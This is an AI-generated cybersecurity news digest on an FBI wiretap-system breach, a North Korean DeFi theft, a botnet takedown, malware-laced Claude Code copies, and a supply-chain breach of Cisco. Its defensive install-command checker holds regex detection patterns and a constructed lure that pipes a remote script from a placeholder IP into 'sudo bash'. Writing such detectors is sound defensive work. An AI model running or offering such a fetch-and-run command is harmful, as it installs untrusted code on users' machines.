The FBI Got Hacked Through Its Own Wiretap System
FBI surveillance systems breached, North Korea steals $280M in crypto, a Claude Code leak spawns malware-laced copies, and a 22-year-old student helps take down a record botnet. This week in cybersecurity.
The agency that wiretaps the world just got wiretapped.
This week, the FBI formally declared a cyberattack on its own surveillance collection systems a "major incident" under federal law—a designation reserved for breaches believed to pose serious risks to national security. It's the first time the bureau has made such a declaration about its own systems since at least 2020. And if the suspected culprit is confirmed, it's not just embarrassing. It's a counterintelligence failure with no clean resolution in sight.
That's just one story from a week that served as a reminder: the infrastructure holding digital life together is far more fragile than most people assume.
The FBI's Worst-Case Scenario
According to Politico, two senior Trump administration officials believe China is behind the intrusion into the FBI's unclassified surveillance systems. Hackers reportedly entered through a commercial internet service provider—the same type of carrier infrastructure that Salt Typhoon, China's long-running espionage campaign, has been systematically compromising since at least 2024.
What was exposed? Court-ordered phone and internet metadata. Personal information on subjects of FBI investigations. The bureau detected "suspicious activities" in February and notified Congress on March 4. In its only public statement, the FBI said it deployed "all technical capabilities to respond"—language that tells you almost nothing.
Here's why the timing matters. Salt Typhoon, uncovered in 2024, had already burrowed into at least 8 domestic telecom and ISP providers, affecting 200+ companies across 80 countries. Researchers said it showed no signs of slowing. If the attribution holds, this latest breach isn't an isolated incident: it's the same campaign finding a new door. The FBI wasn't just a victim of a hack. It was compromised through the very carrier infrastructure its surveillance collection depends on to monitor others.
The irony is hard to miss.
North Korea Stole $280 Million. Again.
Decentralized finance platform Drift confirmed a $280 million cryptocurrency theft this week. Blockchain analytics firm Elliptic attributed the breach to North Korean hackers, citing laundering patterns and network-level indicators consistent with previous Pyongyang-linked operations.
To put that number in context: North Korean hackers stole a total of $2 billion in crypto last year. This year, they're already at nearly $300 million, with this single heist accounting for the vast majority. The pace hasn't slowed. The methods haven't changed dramatically. And the destination of those funds, Kim Jong Un's weapons programs, remains the same.
What has changed is the target profile. DeFi platforms, by design, operate with minimal central oversight. That's the feature. It's also the vulnerability. When there's no central authority to freeze assets or reverse transactions, the window for recovery closes fast. Elliptic tracked the stolen funds moving across blockchains within hours.
For crypto investors and developers: this isn't a question of whether DeFi platforms will be targeted. They already are, repeatedly, at scale.
A 22-Year-Old Helped Take Down a Record-Breaking Botnet
Two weeks ago, US law enforcement dismantled four interconnected botnets—Aisuru, Kimwolf, JackSkid, and Mossad—responsible for some of the largest distributed denial-of-service attacks ever recorded. The Wall Street Journal this week revealed an unlikely figure at the center of the investigation: Benjamin Brundage, a 22-year-old student at the Rochester Institute of Technology.
Brundage obsessively tracked the Kimwolf botnet, which infected home routers and IoT devices and turned them into "residential proxies": relays that route attacker traffic through ordinary home IP addresses so it blends in with legitimate residential traffic. He lurked on Discord, chatted with people he suspected had insider knowledge, and pieced together technical clues that he passed to law enforcement.
No government clearance. No advanced equipment. Just persistence and pattern recognition.
The residential proxy angle is worth sitting with. If your home router is running outdated firmware with factory-default passwords, it may already be part of someone else's attack infrastructure, and you wouldn't know. The WSJ published a guide this week on how to check, and it's worth reading. At minimum: update the firmware, replace the factory credentials, and turn off remote administration and UPnP if you don't need them.
Claude Code's Leak Came With a Bonus: Malware
Anthropic accidentally made the source code for Claude Code—its popular AI-assisted coding tool—publicly accessible. Within hours, developers began reposting copies on GitHub. Some of those repos, BleepingComputer reports, were planted by hackers embedding infostealer malware in the code.
Anthropic responded with copyright takedown notices, initially targeting more than 8,000 repositories before narrowing to 96 copies and adaptations. The malware-laced versions are still circulating.
This is the second time in a month that Claude Code has been used as bait for malware. In March, sponsored Google search ads directed users to fake Claude Code installation pages that prompted them to run malicious terminal commands. The pattern is consistent: Claude Code attracts users who are comfortable enough with technology to want an AI coding tool, but not familiar enough with terminal environments to scrutinize what they're running. A sponsored search result is not a trust signal; an install command is only as safe as the page it came from, so check it against the vendor's own documentation before pasting it.
That's a precise and exploitable gap.
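The "paste this into your terminal" lure works because the victim never reads the command. The script below is an added example, not code from Anthropic or from any of the reported campaigns: it flags the generic red flags a practitioner looks for in a copied install one-liner (remote content piped straight into a shell, encoded payloads, root escalation, downloads from bare IPs or link shorteners, and invisible Unicode characters that can hide text). The rules are assumptions about what a malicious one-liner tends to contain, not indicators from the actual fake Claude Code pages, and both sample commands are constructed.

```python
"""Triage an install one-liner before running it.

Added example for this digest; not code from Anthropic or from any of the
reported campaigns. The rules are generic red flags (assumptions), not
indicators from the real fake install pages. Sample commands are constructed.
"""
import re
import unicodedata

# Zero-width and bidirectional-override code points that can hide or reorder
# text in a copied command (the "Trojan Source" family of tricks).
HIDDEN_CHARS = {"\u200b", "\u200c", "\u200d", "\u2060", "\ufeff",
                "\u202a", "\u202b", "\u202c", "\u202d", "\u202e",
                "\u2066", "\u2067", "\u2068", "\u2069"}

# (rule name, regex, why it matters)
RULES = [
    ("pipe-to-shell",
     re.compile(r"\b(curl|wget)\b[^|]*\|\s*(sudo\s+)?(ba|z|da)?sh\b"),
     "remote content is executed without being saved or inspected"),
    ("encoded-payload",
     re.compile(r"base64\s+(-d|--decode)|\bxxd\s+-r|\bopenssl\s+enc\s+-d"),
     "command body is obfuscated; a legitimate installer has no reason to hide it"),
    ("eval",
     re.compile(r"\beval\b|\bsource\s+<\(|\bbash\s+<\("),
     "evaluates text produced at runtime"),
    ("privilege",
     re.compile(r"\bsudo\b|\bdoas\b"),
     "asks for root; a user-scope npm or pip install should not need it"),
    ("raw-ip-or-shortener",
     re.compile(r"https?://(\d{1,3}(\.\d{1,3}){3}|bit\.ly|tinyurl\.com|t\.co)\b"),
     "download source is a bare IP or a link shortener, not a vendor domain"),
]


def find_hidden_chars(cmd: str) -> list[str]:
    """Return the Unicode names of any invisible or bidi characters in cmd."""
    return [unicodedata.name(ch, hex(ord(ch))) for ch in cmd if ch in HIDDEN_CHARS]


def triage(cmd: str) -> list[tuple[str, str]]:
    """Return (rule_name, explanation) for every red flag found in cmd, in rule order."""
    findings = [(name, why) for name, rx, why in RULES if rx.search(cmd)]
    hidden = find_hidden_chars(cmd)
    if hidden:
        findings.append(("hidden-characters", "contains " + ", ".join(hidden)))
    return findings


def is_suspicious(cmd: str) -> bool:
    """True if any rule fired."""
    return bool(triage(cmd))


if __name__ == "__main__":
    # Constructed samples: a plain user-scope package install and a lure-style one-liner.
    BENIGN = "npm install -g @anthropic-ai/claude-code"
    LURE = ("curl -fsSL http://203.0.113.10/install.sh | sudo bash "
            "&& echo aGk= | base64 -d\u200b")
    for cmd in (BENIGN, LURE):
        print(repr(cmd))
        for name, why in triage(cmd) or [("clean", "no red flags")]:
            print(f"  [{name}] {why}")
```

The heuristics are deliberately loud: a clean vendor command will occasionally trip the privilege rule, and that is fine, because the goal is to make the user stop and read, not to replace reading.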
Cisco's Source Code Was Stolen Through a Security Scanner
Hacker group TeamPCP breached Cisco's developer environments and stole portions of the company's source code—along with code belonging to some of its customers. The entry point? Trivy, a widely used vulnerability scanning tool that TeamPCP had already compromised with its own malicious code.
TeamPCP has used the same playbook against LiteLLM and Checkmarx. The strategy is consistent: compromise a trusted security or developer tool, use it to harvest credentials, then move laterally into high-value targets.
Supply chain attacks are particularly corrosive because they exploit the tools organizations use to protect themselves. The more a company invests in security scanning, the more attractive those scanners become as attack vectors. There's no clean answer to that paradox, only the uncomfortable recognition that trust in software dependencies has to be continuously re-earned, not assumed. In practice that means treating scanners and CI tooling like any other dependency: pinned to immutable versions, verified against checksums recorded in advance, and run with credentials scoped to the job rather than to the whole environment.
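Two of those controls fit in a few lines. The script below is an added example; it is not Cisco's, Aqua's or Trivy's code and does not reproduce how the TeamPCP compromise actually propagated. It audits a GitHub Actions workflow for third-party actions and container images referenced by a movable tag or branch instead of an immutable commit SHA or image digest, and it verifies a downloaded tool binary against a pinned SHA-256. The workflow text, the action names (`example-org/...`) and the placeholder SHAs are constructed.

```python
"""Audit CI dependencies for mutable references and verify pinned checksums.

Added example for this digest; not code from Cisco, Aqua or the Trivy project,
and not a reconstruction of the TeamPCP intrusion. Workflow text, action
names and digests below are constructed placeholders.
"""
import hashlib
import hmac
import re

# Matches `uses: owner/repo@ref`, `uses: docker://image[:tag|@sha256:...]`
# and `uses: ./local/path` at any indentation, with or without a list dash.
USES_RE = re.compile(r"^\s*-?\s*uses:\s*['\"]?([^\s'\"#]+)")
COMMIT_SHA_RE = re.compile(r"^[0-9a-f]{40}$")          # full git commit SHA
IMAGE_DIGEST_RE = re.compile(r"@sha256:[0-9a-f]{64}$")  # OCI image digest


def audit_workflow(text: str) -> list[tuple[int, str, str]]:
    """Return (line_no, reference, reason) for every `uses:` that can silently change."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        m = USES_RE.match(line)
        if not m:
            continue
        ref = m.group(1)
        if ref.startswith("./"):
            continue  # local action, versioned with this repository
        if ref.startswith("docker://"):
            if not IMAGE_DIGEST_RE.search(ref):
                findings.append((n, ref, "container image not pinned by sha256 digest"))
            continue
        if "@" not in ref:
            findings.append((n, ref, "no ref at all; resolves to the default branch"))
            continue
        _, version = ref.rsplit("@", 1)
        if not COMMIT_SHA_RE.match(version):
            findings.append((n, ref, f"ref {version!r} is a tag or branch and can be moved"))
    return findings


def verify_sha256(data: bytes, expected_hex: str) -> bool:
    """Compare a downloaded artifact's SHA-256 with the value pinned ahead of time."""
    actual = hashlib.sha256(data).hexdigest()
    return hmac.compare_digest(actual, expected_hex.lower())


# Constructed workflow: only lines 6, 11 and 12 are acceptable.
WORKFLOW = f"""\
name: scan
jobs:
  scan:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@0123456789abcdef0123456789abcdef01234567
      - uses: example-org/scan-action@main
      - uses: example-org/scan-action@v1.2.3
      - uses: example-org/other-action
      - uses: docker://example/scanner:latest
      - uses: docker://example/scanner@sha256:{'a' * 64}
      - uses: ./.github/actions/local-step
"""

if __name__ == "__main__":
    for line_no, ref, reason in audit_workflow(WORKFLOW):
        print(f"line {line_no}: {ref}: {reason}")
    # Verifying a "download" against a pinned digest (empty input, well-known SHA-256).
    print("checksum ok:", verify_sha256(
        b"", "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"))
```

Pinning to a commit SHA does not make the upstream honest, but it does mean a rewritten tag or a pushed branch cannot change what your pipeline runs without a visible diff in your own repository, which is exactly the review step a tag-based reference skips.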
This content is AI-generated based on source articles. While we strive for accuracy, errors may occur. We recommend verifying with the original source.